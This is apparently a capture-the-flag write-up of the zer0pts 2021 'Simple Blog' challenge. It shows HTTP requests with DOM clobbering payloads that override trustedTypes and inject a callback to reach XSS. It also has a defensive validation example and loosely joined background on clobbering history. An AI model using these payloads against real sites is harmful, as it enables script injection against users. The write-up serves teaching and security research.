DOM Clobbering strikes back: How to use object-oriented programming techniques to avoid this attack



While the wiki covers different aspects of DOM Clobbering, new clobbering techniques and threats are always emerging. Improvements and suggestions, whether to add new content or expand existing documentation, are always more than appreciated. For more information, please refer to contribution guidelines.


Searching inside the frame.html source code, I found something interesting that reminded me of a great article by Gareth Heyes about DOM Clobbering ( -clobbering-strikes-back), in this part of the frame.html JavaScript code:




DOM Clobbering strikes back




```javascript
// JSONP
const jsonp = (url, callback) => {
  const s = document.createElement('script');
  // ... remainder of the function not captured on the page

// initialize blog
const init = () => {
  // try to register trusted types
  try {
    trustedTypes.createPolicy('default', {
      createHTML(url) { return url.replace(/[]/g, ''); },
      createScriptURL(url) {
        if (url.includes('callback')) throw new Error('custom callback is unimplemented');
        // ... remainder of the function not captured on the page
```


You can pass a `callback` parameter to the [`api.php`]( -Writeups/master/zer0pts%20CTF%202021/Simple%20Blog/simple_blog/web/www/api.php) endpoint and the method will be reflected into the output. The length limit is 20 chars.


```http
GET /api.php?callback=foo HTTP/1.1
Host: web.ctf.zer0pts.com:8003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: */*
Referer: :8003/
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
```


The process works as follows:

1. a [`trusted-types`]( -US/docs/Web/HTTP/Headers/Content-Security-Policy/trusted-types) policy is created;
2. the `jsonp` method is invoked;
3. the `jsonp` method calls [`api.php`]( -Writeups/master/zer0pts%20CTF%202021/Simple%20Blog/simple_blog/web/www/api.php), passing the content of `window.callback` if it is specified;
4. [`api.php`]( -Writeups/master/zer0pts%20CTF%202021/Simple%20Blog/simple_blog/web/www/api.php) returns a JavaScript snippet that is included in the web page and executed, because it is considered "safe" by all the defined policies;
5. the default method that gets executed is `render`, which prints the blog posts into the page.


This can be achieved with a technique called [*DOM clobbering*]( -security/dom-based/dom-clobbering). With this technique, `window.callback` can be made to reference an HTML element with `id="callback"`, so a payload like the following can be used.


```http
GET /?theme=dark.min.css%22%3E%3Cdiv+id=%22callback%22%3Efoo%3C/div%3E%3C HTTP/1.1
Host: web.ctf.zer0pts.com:8003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
```


But this triggers the error `custom callback is unimplemented`. That happens because the CSP enforces Trusted Types, and the `default` policy defined in the page's `init()` function throws as soon as the script URL contains the string `callback`.


The *DOM clobbering* technique can help you again. Here are some references that are useful for understanding how it works:

* [ -security/dom-based/dom-clobbering]( -security/dom-based/dom-clobbering)
* [ -clobbering-strikes-back]( -clobbering-strikes-back)
* [ @terjanq/dom-clobbering-techniques-8443547ebe94]( @terjanq/dom-clobbering-techniques-8443547ebe94)
* [ @terjanq/clobbering-the-clobbered-vol-2-fb199ad7ec41]( @terjanq/clobbering-the-clobbered-vol-2-fb199ad7ec41)


The first step is to inject, via *DOM clobbering*, a `trustedTypes` object that overrides the one provided by the library. `createPolicy` then throws an exception and the `catch` block in the `init()` method is reached. To bypass the `if` clause inside the `catch`, it is sufficient to use *DOM clobbering* once more, with a payload like the following.


```http
GET /api.php?callback=//%0Aalert(); HTTP/1.1
Host: web.ctf.zer0pts.com:8003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: :8003/?theme=dark.min.css%22%3E%3Cform%20id=trustedTypes%3E%3Coutput%20id=defaultPolicy%3Etrue%3C/output%3E%3C/form%3E%3Ca%20id=callback%20href=//%250Aalert();%3E%3C/a%3E%3C%22
```

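As an added defensive example (not code from the challenge or from this writeup), here is how the JSONP callback lookup could validate `window.callback` before building the script URL, so that a clobbered global is never string-coerced. The `resolveCallback`, `buildApiUrl` and `naiveApiUrl` names and the anchor stand-in object are assumptions; the 20-character limit is the one the writeup mentions for `api.php`.

```javascript
// Added example: validating a JSONP callback name taken from a global that
// could have been clobbered by injected markup. No real DOM is used here; a
// constructed object mimics how an HTMLAnchorElement stringifies to its href.

const MAX_CALLBACK_LENGTH = 20;            // limit the writeup reports for api.php
const IDENTIFIER = /^[A-Za-z_$][\w$]*$/;   // a plain JavaScript identifier only

// The unsafe pattern: whatever `callback` holds is string-coerced into the URL.
// With <a id="callback" href="//%0Aalert();"> in the page, the href lands in the URL.
function naiveApiUrl(globalObj) {
  return '/api.php?callback=' + (globalObj.callback || 'render');
}

// Hardened lookup: accept only a primitive string that is a short identifier.
// A clobbered global is an HTMLElement or HTMLCollection, never a string,
// so the typeof check alone already rejects every clobbering payload.
function resolveCallback(globalObj, fallback = 'render') {
  const value = globalObj.callback;
  if (typeof value !== 'string') return fallback;
  if (value.length > MAX_CALLBACK_LENGTH) return fallback;
  if (!IDENTIFIER.test(value)) return fallback;   // rejects "//\nalert();" and friends
  return value;
}

function buildApiUrl(globalObj) {
  return '/api.php?callback=' + encodeURIComponent(resolveCallback(globalObj));
}

// Constructed stand-ins for the situations the writeup describes (assumed shapes).
const untouchedWindow = {};                              // no callback defined at all
const legitWindow = { callback: 'renderPosts' };         // a genuine string value
const clobberedWindow = {                                // <a id="callback" href="//\nalert();">
  callback: { href: '//\nalert();', toString() { return this.href; } },
};

// Compare the two lookups side by side; returns [naiveUrl, hardenedUrl] per case.
function compare() {
  return [untouchedWindow, legitWindow, clobberedWindow]
    .map((w) => [naiveApiUrl(w), buildApiUrl(w)]);
}
```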

By now we are used to Gareth Heyes's imagination when naming techniques for exploiting web application vulnerabilities (see DOM-based dangling markup), an imagination that, in 2013, showed itself in labelling this technique "clobbering" (to beat up):


Leaving Gareth's creativity aside, let's focus on the article he published a few days ago on the PortSwigger blog, "DOM Clobbering strikes back". The technique exploits the possibility of overwriting a JavaScript variable or object with an HTMLCollection in order to change the behaviour of the JavaScript code and reach a Cross-Site Scripting. This is very useful when, as in the case of the Lab we will solve in this post, the injected HTML is sanitised to prevent the exploitation of XSS vulnerabilities. Let's take a step back.


PS: Many of the things described in this article have already been introduced in the following link: -14/materials/eu-14-Hayak-Same-Origin-Method-Execution-Exploiting-A-Callback-For-Same-Origin-Policy-Bypass-wp.pdf. Anyway, I will briefly explain some of the subjects again.


The SOME attack was introduced in 2014 by researcher Ben Hayak. There is a great white paper written by him on the attack: -14/materials/eu-14-Hayak-Same-Origin-Method-Execution-Exploiting-A-Callback-For-Same-Origin-Policy-Bypass-wp.pdf. The concept of the attack is cool, but nowadays it is difficult to find scenarios where you can exploit it; however, such scenarios have been found in the past.


The technique used in this attack is the DOM Clobbering of the title. I first came across the word "clobbering" because of this attack method. I looked it up and found that in computing it means overwriting, so the idea is to overwrite something through the DOM in order to carry out an attack.


In 2019, there was a vulnerability in Gmail that was exploited through DOM clobbering. The complete analysis is here: XSS in GMail's AMP4Email via DOM Clobbering. The following briefly describes the process (part of the content is taken from that article).

